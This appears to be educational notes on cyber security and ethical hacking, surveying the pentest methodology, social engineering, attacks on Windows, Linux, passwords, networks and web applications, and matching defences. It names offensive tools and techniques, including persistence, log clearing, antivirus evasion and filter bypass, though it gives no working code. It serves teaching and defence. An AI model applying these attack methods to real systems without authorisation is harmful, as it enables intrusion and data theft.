Cyber Security and Ethical Hacking

Chapter 1:

Hacking refers to the process of exploiting weaknesses in a computer system, network, or

software to gain unauthorized access, steal data, or cause damage. While hacking is often
associated with cybercriminal activities, it can also be used ethically to enhance security and
protect digital systems. Ethical hacking involves authorized security professionals (ethical
hackers) testing and improving system defenses.

Types of Hacking
Hacking can be categorized into different types based on intent and methodology:

1.​ Ethical Hacking (White Hat Hacking)​

○​ Conducted by security professionals to find and fix vulnerabilities.

○​ Legal and performed with proper authorization.
○​ Helps organizations improve cybersecurity.
2.​ Black Hat Hacking​

○​ Involves unauthorized access to systems for malicious purposes.

○​ Used for data theft, financial fraud, cyber espionage, and destruction.
○​ Illegal and punishable under cyber laws.
3.​ Grey Hat Hacking​

○​ Falls between ethical and black hat hacking.

○​ Hackers exploit vulnerabilities without permission but may inform the
organization afterward.
○​ Still considered illegal if done without authorization.
4.​ Script Kiddies​

○​ Inexperienced hackers who use pre-written tools and scripts to exploit systems.
○​ Often attack websites and networks for fun or recognition.
5.​ Hacktivism​

○​ Hacking done for political or social activism.

○​ Targets government websites, corporations, or organizations to spread messages.
6.​ State-Sponsored Hacking​
 ○​ Conducted by governments to spy, gather intelligence, or disrupt foreign systems.
○​ Used in cyber warfare and espionage.

Hacking Process (Ethical Hacking Methodology)

Ethical hackers follow a systematic approach to identify and fix vulnerabilities in a system. The
hacking process includes the following steps:

1. Reconnaissance (Information Gathering)

●​ Collecting information about the target system using public and open-source methods.
●​ Passive Reconnaissance: No direct interaction with the target (e.g., searching online).
●​ Active Reconnaissance: Directly engaging with the target (e.g., scanning ports).

2. Scanning & Enumeration

●​ Identifying live hosts, open ports, and services running on a target system.
●​ Using tools like Nmap, Nessus, and Wireshark to analyze vulnerabilities.

3. Gaining Access

●​ Exploiting vulnerabilities to enter the system.

●​ Using malware, phishing, password cracking, and SQL injection techniques.

4. Maintaining Access (Persistence)

●​ Creating backdoors or establishing control to retain access to the system.

●​ Attackers install rootkits, Trojans, or modify system configurations.

5. Covering Tracks (Clearing Evidence)

●​ Deleting logs, clearing history, and hiding malicious activities.

●​ Ensures that hackers remain undetected for longer periods.

6. Reporting & Fixing (For Ethical Hackers)

●​ Ethical hackers document vulnerabilities and suggest fixes.

●​ Security teams patch weaknesses and strengthen defenses.

Conclusion
Hacking plays a crucial role in cybersecurity. While black hat hacking poses serious threats,
ethical hacking helps organizations identify risks and protect their digital assets. Learning ethical
hacking techniques is essential for cybersecurity professionals to secure systems against cyber
threats.

1. Basics of Security
Security is the practice of protecting digital assets from unauthorized access, attacks, and
damage. It includes various measures to safeguard data, networks, and systems from cyber
threats.

Types of Security

●​ Network Security – Protects networks from cyber threats such as malware, DDoS
attacks, and unauthorized access.
●​ Information Security – Ensures data privacy and prevents unauthorized data access or
modification.
●​ Application Security – Protects software applications from vulnerabilities and attacks.
●​ Operational Security – Involves securing operational processes, including user
permissions and data handling.
●​ Physical Security – Protects hardware, servers, and devices from theft, damage, or
unauthorized access.

2. Elements of Security
The key elements of security form the foundation of cyber security and ethical hacking. The
most common framework is the CIA Triad.

A. CIA Triad

1.​ Confidentiality – Ensures that only authorized users can access sensitive data.
2.​ Integrity – Prevents unauthorized modification of data, ensuring accuracy and
trustworthiness.
3.​ Availability – Ensures that data and services are accessible when needed.

B. Other Security Elements

4.​ Authentication – Verifies the identity of users accessing a system.

5.​ Authorization – Grants specific permissions based on user roles.
6.​ Non-repudiation – Ensures that actions taken within a system cannot be denied.
7.​ Accountability – Tracks and logs user activities for audit and security analysis.
3. Security Threats in Cyber Security
●​ Malware (Viruses, Trojans, Ransomware, Spyware)
●​ Phishing Attacks
●​ Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
●​ SQL Injection
●​ Man-in-the-Middle (MITM) Attacks
●​ Zero-Day Exploits

4. Ethical Hacking and Security

Ethical hackers use hacking techniques to test and improve security. They follow legal and
ethical guidelines to identify and fix vulnerabilities before malicious hackers exploit them.

Key Roles of an Ethical Hacker

●​ Performing penetration testing.

●​ Identifying security loopholes.
●​ Strengthening network and system security.
●​ Ensuring compliance with security policies.

Security is an ongoing process that requires continuous monitoring, updates, and improvements
to counter evolving cyber threats. Ethical hacking plays a crucial role in maintaining a secure
digital environment.

Penetration testing (or pen testing) is a crucial aspect of cybersecurity and ethical hacking,
aimed at identifying vulnerabilities in systems, networks, and web applications. Here's a
breakdown of key components related to web-based exploitation in penetration testing:

🔹 1. Penetration Testing Process

Penetration testing involves a structured approach to identifying and exploiting vulnerabilities in
a system:

1.​ Reconnaissance – Gathering information about the target.

2.​ Scanning – Identifying live hosts, open ports, and services.
3.​ Exploitation – Using vulnerabilities to gain access.
4.​ Post-Exploitation – Maintaining access and extracting information.
5.​ Reporting – Documenting vulnerabilities and suggesting fixes.
🔹 2. Scanning Techniques
Before exploitation, scanning helps in identifying attack vectors:

●​ Port Scanning: Identifies open ports (e.g., using Nmap).

●​ Vulnerability Scanning: Detects weaknesses (e.g., Nessus, OpenVAS).
●​ Directory Busting: Finds hidden directories (e.g., Gobuster, Dirb).
●​ Web Application Scanning: Checks for OWASP Top 10 vulnerabilities (e.g., Burp
Suite, Nikto).

🔹 3. Web-Based Exploitation
Web applications often have vulnerabilities that attackers exploit:

🛠 Common Web-Based Attacks

1.​ SQL Injection (SQLi) – Injecting malicious SQL queries (Tools: SQLmap).
2.​ Cross-Site Scripting (XSS) – Injecting JavaScript in web pages (Tools: XSSer, BeEF).
3.​ Cross-Site Request Forgery (CSRF) – Forcing users to perform unintended actions.
4.​ Remote Code Execution (RCE) – Executing arbitrary code on a server.
5.​ File Inclusion Attacks – Exploiting Local/Remote File Inclusion (LFI/RFI).
6.​ Broken Authentication & Session Management – Bypassing authentication
mechanisms.
7.​ Server-Side Request Forgery (SSRF) – Exploiting backend systems via crafted
requests.

🛠 Exploitation Tools
●​ Burp Suite – Web vulnerability scanner & proxy tool.
●​ Metasploit – Framework for exploitation.
●​ SQLmap – Automated SQL injection tool.
●​ BeEF – Browser Exploitation Framework for XSS attacks.
●​ OWASP ZAP – Web vulnerability scanner.

🔹 4. Post-Exploitation
Once a system is exploited, attackers aim to:

●​ Escalate Privileges (Gain admin/root access).

●​ Establish Persistence (Backdoors, web shells like Weevely).
●​ Exfiltrate Data (Steal sensitive data).
●​ Lateral Movement (Spread through the network).
🔹 5. Mitigation & Prevention
●​ Input Validation & Sanitization to prevent SQLi/XSS.
●​ Secure Authentication Mechanisms (MFA, strong passwords).
●​ Web Application Firewalls (WAF) to block attacks.
●​ Regular Security Patching to fix known vulnerabilities.
●​ Least Privilege Principle to restrict access.

🔹 6. Ethical Hacking & Legal Considerations

●​ Always get permission before testing (Penetration Testing Agreement).
●​ Follow ethical hacking principles to report and fix vulnerabilities.
●​ Be aware of cyber laws such as the Computer Fraud and Abuse Act (CFAA).

CHAPTER 2:

Ethical hacking is a crucial aspect of cybersecurity that involves testing and securing systems by
identifying vulnerabilities before malicious hackers can exploit them. It is also known as
penetration testing or white-hat hacking and plays a significant role in strengthening an
organization's defense against cyber threats.

🔹 Key Aspects of Ethical Hacking in Cybersecurity

1.​ Reconnaissance (Information Gathering)​

○​ Passive and active footprinting

○​ OSINT (Open-Source Intelligence) gathering
○​ Social engineering tactics
2.​ Scanning and Enumeration​

○​ Identifying live hosts and open ports

○​ Using tools like Nmap, Nessus, and OpenVAS
○​ Extracting system details and network information
3.​ Exploitation and Gaining Access​

○​ Identifying system vulnerabilities

○​ Exploiting weak passwords, misconfigurations, or outdated software
○​ Using Metasploit, Burp Suite, or other hacking frameworks
4.​ Privilege Escalation and Maintaining Access​

○​ Elevating permissions (root/admin access)

 ○​ Deploying backdoors and persistence techniques
5.​ Covering Tracks and Post-Exploitation​

○​ Clearing logs and hiding malicious activity

○​ Exfiltrating data securely

🔹 Popular Ethical Hacking Tools

●​ Kali Linux – A penetration testing OS with pre-installed hacking tools
●​ Metasploit – For exploiting vulnerabilities in networks and applications
●​ Wireshark – A network protocol analyzer for sniffing traffic
●​ Burp Suite – For web application security testing
●​ John the Ripper – A password-cracking tool

🔹 Certifications in Ethical Hacking

●​ CEH (Certified Ethical Hacker) – EC-Council
●​ OSCP (Offensive Security Certified Professional)
●​ CompTIA Security+ and PenTest+
●​ GIAC Penetration Tester (GPEN)

Hacking methodology in cybersecurity and ethical hacking follows a structured approach to

identifying and exploiting vulnerabilities in a system. Ethical hackers use these methodologies
legally and with permission to improve security. Here’s a breakdown of the key steps:

1. Reconnaissance (Footprinting)

●​ Gathering information about the target system.

●​ Two types:
○​ Passive Reconnaissance: Collecting data without directly interacting with the
target (e.g., WHOIS lookup, social media analysis).
○​ Active Reconnaissance: Direct interaction with the target (e.g., network
scanning, DNS queries).

2. Scanning & Enumeration

●​ Identifying live hosts, open ports, and services running on the target.
●​ Tools: Nmap, Nessus, OpenVAS
●​ Types:
○​ Network Scanning: Detecting active devices.
○​ Port Scanning: Finding open ports.
 ○​ Service Enumeration: Identifying services and versions.

3. Gaining Access (Exploitation)

●​ Exploiting vulnerabilities to gain control over the system.

●​ Methods:
○​ Brute Force Attacks (password guessing)
○​ Exploiting Software Vulnerabilities
○​ Phishing & Social Engineering
●​ Tools: Metasploit, Hydra, SQLmap

4. Maintaining Access (Persistence)

●​ Ensuring continued access after exploitation.

●​ Methods:
○​ Creating backdoors
○​ Privilege escalation
○​ Rootkits, Trojans
●​ Tools: Netcat, Mimikatz

5. Covering Tracks (Clearing Evidence)

●​ Hiding malicious activities to avoid detection.

●​ Methods:
○​ Clearing logs
○​ Deleting evidence
○​ Disabling security mechanisms
●​ Tools: Timestomp, Stealth Rootkits

6. Reporting & Remediation (For Ethical Hacking)

●​ Documenting vulnerabilities and how they were exploited.

●​ Providing mitigation strategies to fix security flaws.
●​ Delivering reports to stakeholders.

Social Engineering in Cybersecurity and Ethical Hacking

What is Social Engineering?

Social engineering is a cyberattack technique that exploits human psychology to manipulate

individuals into revealing confidential information or performing actions that compromise
security. Unlike traditional hacking, which targets system vulnerabilities, social engineering
attacks target people as the weakest link in cybersecurity.

Types of Social Engineering Attacks

1.​ Phishing – Attackers send fraudulent emails, messages, or websites to trick users into
providing sensitive information such as passwords, credit card numbers, or personal
details.​

○​ Variants: Spear phishing (targeted attacks), Whaling (high-profile targets),

Smishing (SMS phishing), and Vishing (voice phishing).
2.​ Pretexting – The attacker fabricates a scenario (pretext) to gain trust and extract
information. Example: Pretending to be an IT support staff to ask for login credentials.​

3.​ Baiting – Attackers lure victims by offering something enticing, such as free software
downloads or USB devices loaded with malware.​

4.​ Tailgating (Piggybacking) – Gaining physical access to restricted areas by following an

authorized person, often by pretending to be an employee or contractor.​

5.​ Quid Pro Quo – Offering a service or benefit in exchange for sensitive information.
Example: A scammer posing as a tech support agent offering to fix a problem but actually
installing malware.​

6.​ Dumpster Diving – Searching through discarded documents, hard drives, or devices to
find confidential data like passwords, account details, or company information.​

Real-World Examples of Social Engineering Attacks

●​ 2016 Democratic National Committee (DNC) Hack: Hackers used spear phishing
emails to gain access to DNC systems.
●​ Google and Facebook Scam (2013-2015): Attackers tricked employees into wiring over
$100 million by posing as a vendor using fake invoices.
●​ Kevin Mitnick’s Attacks: One of the most infamous hackers, Mitnick used social
engineering to manipulate people into providing sensitive information.

Defensive Measures Against Social Engineering

1.​ Security Awareness Training – Educate employees and individuals on recognizing and
avoiding social engineering tactics.
 2.​ Multi-Factor Authentication (MFA) – Adding an extra layer of security reduces the
risk of credential theft.
3.​ Verification Policies – Always verify a request before sharing sensitive information or
granting access.
4.​ Email Filtering & Anti-Phishing Tools – Implement spam filters and security solutions
that detect phishing attempts.
5.​ Least Privilege Principle – Limit user access to only necessary resources to reduce
exposure.
6.​ Physical Security Measures – Restrict access to critical areas and use ID verification for
entry.

Ethical Hacking & Social Engineering

Ethical hackers (penetration testers) use social engineering techniques to assess security
vulnerabilities. Organizations hire them to simulate attacks and identify weaknesses in human
security practices. Common ethical hacking techniques include:

●​ Phishing simulations to test employee awareness.

●​ Pretexting exercises to see if employees follow security protocols.
●​ Physical security testing (e.g., attempting unauthorized access).

1. Physical Security in Cybersecurity

Physical security is the first layer of cybersecurity, focusing on preventing unauthorized physical
access to computers, networks, and data.

Key Aspects:

●​ Access Control: Using biometric scanners, key cards, or PINs to restrict access to critical
areas.
●​ Security Cameras & Surveillance: Monitoring server rooms and workspaces to detect
unauthorized entry.
●​ RFID & Smart Locks: Ensuring that only authorized personnel can enter restricted
areas.
●​ Tamper-proof Devices: Laptops, USBs, and hardware should have anti-tampering
mechanisms.
●​ Social Engineering Protection: Preventing tailgating, dumpster diving, and
unauthorized personnel from accessing secured locations.
●​ Data Center Security: Securing physical servers with locked racks, fire suppression
systems, and environmental monitoring.
Attacks on Physical Security:

●​ Tailgating: An attacker follows an authorized person into a secure area.

●​ Shoulder Surfing: Observing someone entering a password or PIN.
●​ Dumpster Diving: Extracting sensitive data from discarded documents or hardware.
●​ Hardware Implants: Placing malicious hardware like keyloggers or rogue devices inside
company systems.

2. Hacking Windows
Windows is one of the most widely used operating systems, making it a primary target for
hackers.

Common Windows Exploits:

●​ Privilege Escalation: Exploiting vulnerabilities to gain higher system privileges.

●​ DLL Injection: Injecting malicious DLLs into legitimate processes.
●​ Pass-the-Hash Attack: Using hashed credentials to authenticate without knowing the
actual password.
●​ Remote Code Execution (RCE): Running arbitrary code on a target machine using
Windows vulnerabilities.
●​ SMB Exploits (EternalBlue, WannaCry): Exploiting outdated SMB (Server Message
Block) protocols.
●​ PowerShell Attacks: Using PowerShell scripts to automate attacks, execute malware, or
bypass security tools.

Tools for Hacking Windows:

●​ Mimikatz: Extracting Windows passwords from memory.

●​ Metasploit: Running exploits and payloads against Windows machines.
●​ Empire: Post-exploitation framework for Windows.
●​ Windows Exploit Suggester: Checking for missing patches and vulnerabilities.

Protection Against Windows Hacking:

●​ Keep Windows updated with the latest patches.

●​ Use Windows Defender + EDR (Endpoint Detection and Response).
●​ Disable unnecessary services (like SMBv1).
●​ Enable BitLocker encryption to protect data.
●​ Use strong password policies and multi-factor authentication (MFA).
3. Password Hacking
Passwords are a weak link in security, often exploited using various techniques.

Types of Password Attacks:

●​ Brute Force Attack: Trying all possible combinations until the correct password is
found.
●​ Dictionary Attack: Using a list of common passwords to guess the correct one.
●​ Credential Stuffing: Using leaked username-password combinations from data breaches.
●​ Rainbow Table Attack: Precomputed hashes of passwords are used to crack hashed
passwords.
●​ Keylogging: Recording keystrokes using hardware or software keyloggers.
●​ Phishing: Tricking users into revealing their passwords through fake emails or websites.
●​ Social Engineering: Manipulating people into revealing their credentials.

Tools for Password Cracking:

●​ John the Ripper: A fast password-cracking tool.

●​ Hashcat: The fastest password recovery tool using GPU acceleration.
●​ Hydra: Online password brute-force tool.
●​ Cain & Abel: Password recovery and cracking tool for Windows.

Protection Against Password Hacking:

●​ Use long and complex passwords (at least 12–16 characters).

●​ Implement MFA (Multi-Factor Authentication).
●​ Use password managers to generate and store strong passwords.
●​ Never reuse passwords across multiple accounts.
●​ Use account lockout policies to prevent brute-force attacks.

4. Privacy Attacks
Privacy attacks focus on stealing, monitoring, or manipulating personal or organizational data.

Common Privacy Attacks:

●​ MITM (Man-in-the-Middle) Attack: Intercepting communication between two parties

(e.g., unsecured Wi-Fi).
●​ Data Exfiltration: Stealing sensitive data from a system.
 ●​ Tracking & Fingerprinting: Using cookies, trackers, and browser fingerprinting to
collect user data.
●​ Spyware & Keyloggers: Secretly monitoring and recording user activity.
●​ Webcam & Microphone Hacking: Exploiting device permissions to eavesdrop on users.
●​ Metadata Exploitation: Extracting information from file metadata (e.g., geolocation
from images).
●​ Rogue Apps & Extensions: Malicious applications collecting private user data.

Tools Used in Privacy Attacks:

●​ Wireshark: Sniffing and analyzing network traffic.

●​ Evilginx: Advanced phishing and MITM attack tool.
●​ BeEF (Browser Exploitation Framework): Exploiting browser vulnerabilities.
●​ SpyNote: Android spyware for remote surveillance.

Protection Against Privacy Attacks:

●​ Use a VPN to encrypt internet traffic.

●​ Block third-party cookies & tracking scripts in browsers.
●​ Keep software and browsers updated to patch vulnerabilities.
●​ Use anti-spyware tools and regular security scans.
●​ Cover your webcam and mute microphones when not in use.

1. Hacking the Network

Network hacking involves compromising or testing the security of networks. It includes
techniques like sniffing, spoofing, session hijacking, and DoS/DDoS attacks.

🔹 Key Concepts:
●​ Network Basics – OSI model, TCP/IP protocols, ports, firewalls, NAT, proxies.
●​ Packet Sniffing – Capturing network traffic using tools like Wireshark, tcpdump,
Ettercap.
●​ IP & MAC Spoofing – Changing IP/MAC addresses to impersonate devices.
●​ MITM (Man-in-the-Middle) Attacks – Intercepting communication using Bettercap,
ARP spoofing, SSL stripping.
●​ Session Hijacking – Exploiting active sessions (e.g., cookie theft using Burp Suite).
●​ DNS Spoofing & Poisoning – Redirecting users to malicious sites.
●​ Wireless Hacking – Cracking Wi-Fi networks (WEP, WPA/WPA2) using Aircrack-ng,
Reaver, Fern WiFi Cracker.
 ●​ DDoS (Distributed Denial of Service) – Overloading networks using LOIC, HOIC,
Slowloris, botnets.

2. Hacking Windows OS
Windows systems are common targets due to their widespread usage.

🔹 Exploiting Windows Security Flaws:

●​ Privilege Escalation – Exploiting vulnerabilities to gain admin access (e.g., Kernel
exploits, UAC bypass).
●​ Password Cracking – Extracting passwords from SAM file or hashes using Mimikatz,
John the Ripper, Hashcat.
●​ DLL Injection & Process Hollowing – Running malicious code in legitimate processes.
●​ Remote Exploits – Using tools like Metasploit, Empire, Psexec, RDP Exploits.
●​ Registry Manipulation – Editing Windows Registry for persistence and backdoors.
●​ Windows Defender Evasion – Bypassing security tools with obfuscation, AMSI
bypass techniques.

🔹 Tools for Windows Hacking:

●​ Metasploit Framework – Exploiting Windows vulnerabilities.
●​ Mimikatz – Extracting passwords and credentials from memory.
●​ Empire & Cobalt Strike – Post-exploitation and persistence.
●​ BloodHound – Mapping Active Directory (AD) attack paths.
●​ PowerShell Empire – Fileless malware attacks via PowerShell.

3. Hacking Linux OS
Linux is widely used in servers, making it a critical target for ethical hackers.

🔹 Linux Security Exploits:

●​ Privilege Escalation – Exploiting SUID binaries, misconfigured sudo, and kernel
vulnerabilities.
●​ Brute-force SSH Access – Using tools like Hydra, Medusa to crack SSH credentials.
●​ File Permission Exploits – Misconfigured permissions allowing unauthorized access.
●​ Exploiting Weak Services – Attacking FTP, Telnet, MySQL, Apache vulnerabilities.
●​ Kernel Exploits – Using Dirty COW, PwnKit, ExploitDB for root access.
●​ Backdooring Linux Systems – Persistent access with cron jobs, rootkits, PAM
backdoors.
🔹 Tools for Linux Hacking:
●​ Linux Exploit Suggester – Identifies potential privilege escalation vulnerabilities.
●​ LinPEAS & LinEnum – Linux privilege escalation auditing tools.
●​ Chisel & ProxyChains – Tunneling for bypassing firewalls.
●​ Netcat – Reverse shells and remote access.
●​ Hydra & John the Ripper – Password cracking.

Next Steps in Cybersecurity & Ethical Hacking

●​ Set up a Pentesting Lab – Install Kali Linux, Parrot OS in a virtual machine.
●​ Practice with CTFs (Capture The Flag) – Try platforms like Hack The Box,
TryHackMe.
●​ Learn Scripting – Python & Bash scripting for automation.
●​ Understand Malware Analysis – Reverse engineering malware using IDA Pro, Ghidra.

1. Application Hacking
Definition

Application hacking refers to exploiting vulnerabilities in software applications, such as web

apps, desktop apps, or mobile apps, to gain unauthorized access, disrupt services, or steal data.

Techniques Used in Application Hacking

1.​ Web Application Attacks​

○​ SQL Injection (SQLi): Injecting malicious SQL queries into web forms to
manipulate databases.
○​ Cross-Site Scripting (XSS): Injecting malicious scripts into websites that
execute in users’ browsers.
○​ Cross-Site Request Forgery (CSRF): Trick users into executing unwanted
actions.
○​ Directory Traversal: Accessing restricted directories on the server.
○​ Remote File Inclusion (RFI) & Local File Inclusion (LFI): Uploading
malicious files to exploit vulnerabilities.
2.​ Desktop Application Attacks​

○​ Buffer Overflow: Overloading a program’s memory to execute arbitrary code.

○​ Privilege Escalation: Exploiting application flaws to gain higher privileges.
 ○​ Reverse Engineering: Analyzing app code to find vulnerabilities.
3.​ Mobile Application Attacks​

○​ APK Reverse Engineering: Decompiling Android apps to find vulnerabilities.

○​ Insecure Data Storage: Exploiting weak storage mechanisms in apps.

2. Footprinting
Definition

Footprinting is the process of gathering information about a target system, network, or

organization to plan an attack. This can be passive (indirect, without interacting with the target)
or active (direct interaction with the target).

Types of Footprinting

1.​ Passive Footprinting:​

○​ Searching public databases, social media, and job listings.

○​ Checking domain records using WHOIS Lookup.
○​ Using Google Dorking to find exposed files or pages.
2.​ Active Footprinting:​

○​ Directly interacting with the target system.

○​ Using network sniffing tools like Wireshark to analyze traffic.
○​ Probing firewalls and security measures.

Tools for Footprinting

●​ Shodan (Search for exposed devices and open ports).

●​ Maltego (Graph-based footprinting).
●​ Recon-ng (OSINT tool for gathering data).
●​ Google Dorking (Using advanced Google search queries).

3. Scanning
Definition

Scanning involves actively probing a system or network to detect open ports, running services,
and potential vulnerabilities.
Types of Scanning

1.​ Network Scanning​

○​ Identifies live hosts, open ports, and active services.

○​ Uses tools like Nmap, Angry IP Scanner.
2.​ Port Scanning​

○​ Checks which network ports are open and can be exploited.

○​ Uses Nmap, Netcat, Masscan.
3.​ Vulnerability Scanning​

○​ Detects known security flaws in a system.

○​ Uses Nessus, OpenVAS, Acunetix.
4.​ Web Application Scanning​

○​ Identifies vulnerabilities in web applications.

○​ Uses Burp Suite, OWASP ZAP.

Tools for Scanning

●​ Nmap (Network scanning & fingerprinting).

●​ Nikto (Web server scanning).
●​ Nessus (Comprehensive vulnerability scanner).
●​ OWASP ZAP (Automated web application scanner).

4. Enumeration
Definition

Enumeration is the process of extracting information from a target system after identifying active
hosts and open ports.

Types of Enumeration

1.​ User Enumeration​

○​ Extracting valid usernames via login pages, email services, or directories.

○​ Tools: Metasploit, Enum4Linux, THC Hydra.
2.​ Network Enumeration​
 ○​ Finding shared resources, active directories, and network shares.
○​ Tools: nbtscan, SNMPwalk, NBTscan.
3.​ DNS Enumeration​

○​ Gathering DNS records, subdomains, and MX records.

○​ Tools: dnsenum, Fierce, Sublist3r.
4.​ SMB Enumeration​

○​ Extracting information from Windows SMB shares.

○​ Tools: Enum4Linux, SMBmap.

Tools for Enumeration

●​ Metasploit (Powerful exploitation framework).

●​ Enum4Linux (Extracts Windows/Samba info).
●​ Netcat (Checks open ports & backdoor connections).
●​ SNMPwalk (Extracts SNMP info).

CHAPTER 3:

Evolution of Web Applications

Web applications have evolved significantly over time:

1.​ Static Web (Web 1.0) - Early 1990s​

○​ Simple HTML pages​

○​ No interactivity; just text and images​

○​ No authentication or user inputs​

2.​ Dynamic Web (Web 2.0) - Late 1990s to 2000s​

○​ Server-side scripting (PHP, ASP, JSP)​

○​ Databases introduced (MySQL, PostgreSQL)​

○​ Forms and user interactions (shopping carts, login forms)​

 ○​ Rise of AJAX for asynchronous requests​

3.​ Modern Web (Web 3.0 & Beyond) - 2010s to Present​

○​ Single Page Applications (SPAs) using JavaScript frameworks (React, Angular,

Vue.js)​

○​ APIs (REST, GraphQL)​

○​ Cloud computing, serverless architecture​

○​ Decentralized applications (Blockchain, Web3)

Web Application Security

With web applications becoming more complex, security threats have also increased. Key
security concerns include:

1.​ Common Web Vulnerabilities (OWASP Top 10)​

○​ SQL Injection (SQLi)​

○​ Cross-Site Scripting (XSS)​

○​ Cross-Site Request Forgery (CSRF)​

○​ Broken Authentication & Session Management​

○​ Security Misconfigurations​

○​ Server-Side Request Forgery (SSRF)​

○​ Insecure Direct Object References (IDOR)​

2.​ Secure Development Practices​

○​ Input validation (Sanitization, Whitelisting)​

○​ Use of security headers (CSP, X-Frame-Options, HSTS)​

 ○​ HTTPS (SSL/TLS encryption)​

○​ Secure authentication (MFA, OAuth, OpenID Connect)

Core Defense Mechanisms

To protect web applications, several defense mechanisms should be implemented:

1.​ Authentication & Authorization​

○​ Strong password policies, Multi-Factor Authentication (MFA)​

○​ OAuth 2.0, OpenID Connect, JWT for secure access​

2.​ Encryption​

○​ SSL/TLS for secure communication​

○​ Hashing (bcrypt, Argon2) for password storage​

3.​ Web Application Firewalls (WAF)​

○​ Filters malicious requests (Cloudflare WAF, AWS WAF)​

4.​ Intrusion Detection & Prevention Systems (IDS/IPS)​

○​ Identifies anomalies and blocks attacks (Snort, Suricata)​

5.​ Secure API Design​

○​ Rate limiting, input validation, token-based authentication

Managing the Application in Cybersecurity

Security is a continuous process. Key areas for managing application security:

1.​ Secure Deployment & Hosting​

○​ Cloud security (AWS, Azure, Google Cloud)​

 ○​ Regular security updates and patches​

2.​ Security Monitoring & Logging​

○​ Log management tools (ELK Stack, Splunk)​

○​ Real-time monitoring with SIEM (Security Information and Event Management)​

3.​ Penetration Testing & Ethical Hacking​

○​ Identifying vulnerabilities before attackers do​

○​ Using tools like Burp Suite, OWASP ZAP, Metasploit, Nmap​

4.​ Incident Response & Disaster Recovery​

○​ Plan for DDoS attacks, data breaches​

○​ Regular security audits & compliance checks (GDPR, PCI-DSS)

1. Web Hacking (Website Hacking Techniques)

Web hacking refers to attacking web applications, websites, or web servers to gain unauthorized
access, manipulate content, or extract sensitive data. Common techniques include:

🔎 Common Web Hacking Techniques:

Technique Description

SQL Injection (SQLi) Malicious SQL queries are injected into input fields to
manipulate databases (e.g., login bypass, data dump).

Cross-Site Scripting (XSS) Inserting malicious scripts into web pages viewed by
other users.
 Cross-Site Request Forgery Forcing an authenticated user to perform unwanted
(CSRF) actions.

Directory Traversal Accessing files/folders outside the intended directory

by manipulating URL paths.

Remote File Inclusion (RFI) / Uploading malicious scripts or accessing server files.
Local File Inclusion (LFI)

Cookie Manipulation Altering cookies to bypass authentication or gain

higher privileges.

Session Hijacking Stealing session tokens to impersonate a user.

DNS Spoofing/Poisoning Redirecting users to malicious websites.

Tools Used: Burp Suite, OWASP ZAP, Nikto, SQLMap, Metasploit

2. Web Functionality (How Websites Work Technically)

Understanding how web applications function helps ethical hackers identify weak points.

🌐 Web Components:
●​ Frontend (Client-Side): HTML, CSS, JavaScript – everything a user sees​

●​ Backend (Server-Side): PHP, Python, Node.js, Java – processes data, database

interaction​

●​ Databases: MySQL, PostgreSQL, MongoDB – store user data​

●​ APIs: Interfaces for communication between services​

 ●​ Web Servers: Apache, Nginx, IIS – deliver content to the user​

●​ Authentication Systems: OAuth, JWT, SAML – manage user sessions​

🔥 Web Application Flow:

User Request → DNS Lookup → Web Server → Database Query → Rendered Web Page →
User Interaction → Backend/API Calls → Database Update → Repeat

3. How to Block Content on the Internet (Content Filtering &

Control)
Blocking harmful or unwanted content is critical for cybersecurity. Methods include:

🚫 Techniques for Blocking Content:

Method Description

DNS Filtering Blocks websites at the DNS level (e.g., OpenDNS).

Firewall Rules Blocking IP ranges or specific websites through firewall

configurations.

URL Filtering Blocks specific URLs or keywords.

Content Filtering Intercept and inspect content (Squid Proxy, Websense).

Proxies

Browser Extensions Ad Blockers, privacy extensions to block scripts/trackers.

 ISP-level Filtering Internet Service Providers restrict access to specific content (common
in countries with heavy censorship).

Parental Controls Tools to block adult or sensitive content.

4. Web Pages through Email (Phishing & Security Risks)

Emails often contain web pages or links, making email a significant attack vector.

📩 Risks and Attack Techniques:

Attack Description

Phishing Fake websites or forms sent via email to steal credentials.

Spear Phishing Targeted phishing aimed at specific individuals/companies.

HTML Email Embedding malicious scripts in HTML emails.

Injection

Malware Attachments Delivering malicious web pages or scripts as email attachments.

Security Tip: Avoid clicking unknown email links or downloading attachments.

5. Web Messengers (Instant Messaging Apps on the Web)

Web messengers are chat platforms running in browsers or as web apps (e.g., WhatsApp Web,
Facebook Messenger).
💬 Security Threats in Web Messengers:
●​ Session Hijacking: Stealing active session cookies.​

●​ Man-in-the-Middle (MITM) attacks: Intercepting chat data over unsecured Wi-Fi.​

●​ XSS in Chat: Injecting scripts via message input fields.​

●​ End-to-End Encryption Bypass: Intercepting plaintext before encryption/decryption on

endpoints.​

Defense: Use HTTPS, avoid public Wi-Fi, and enable two-factor authentication.

🛡 Cybersecurity Measures & Best Practices

●​ Use of Web Application Firewalls (WAF)​

●​ HTTPS Everywhere​

●​ Input Validation & Sanitization​

●​ Regular Security Testing (Penetration Testing)​

●​ Patch Management (Regular Updates)​

●​ User Awareness & Training

🌐 Final Summary (Ethical Hacking Perspective)

Area Target/Vulnerability Ethical Hacking Goal

Web Hacking Websites, apps, databases Find, report, fix vulnerabilities

Web HTTP/HTTPS, APIs, server logic Understand architecture & weak

Functionality points
 Blocking Unwanted/malicious sites, phishing, Protect users from harmful content
Content malware

Email Web Phishing, malware, credential theft Educate users, filter emails,
Pages analyze attacks

Web Messengers Session hijacking, XSS, MITM Secure communication channels

1. Unblocking Applications
🔎 What It Means:
Unblocking applications refers to bypassing restrictions that prevent an app or website from
working. This is common in networks with firewalls, web filters, or parental controls (like
schools, workplaces, or censored countries).

🔧 Techniques:
a) Proxy Servers:

●​ Use a proxy to relay traffic, hiding the destination from the restrictive firewall.​

●​ Example: Hiding the connection to YouTube behind a proxy server.​

b) VPN (Virtual Private Network):

●​ Creates an encrypted tunnel, making the traffic unreadable by firewalls.​

●​ Useful against geo-restrictions or local network restrictions.​

c) DNS Tunneling:

●​ Exploiting DNS queries to tunnel data out, bypassing content filters.​

 ●​ Rare but clever method for breaking out of restrictive networks.​

d) Tor Network / Onion Routing:

●​ Routes traffic through multiple nodes to anonymize and bypass restrictions.​

●​ Mostly used for privacy but can help unblock apps.​

⚠️ Ethical Note:
●​ In ethical hacking, these techniques are used for penetration testing to simulate a
malicious actor’s bypass attempt.​

●​ Illegal if used to access restricted services without permission.​

2. Code Injection (Including SQL Injection)

🔎 What It Means:
Code Injection is when an attacker injects malicious code into a vulnerable application, tricking
it into executing unintended commands. It's one of the OWASP Top 10 risks.

🔥 SQL Injection (SQLi):

📌 Definition:
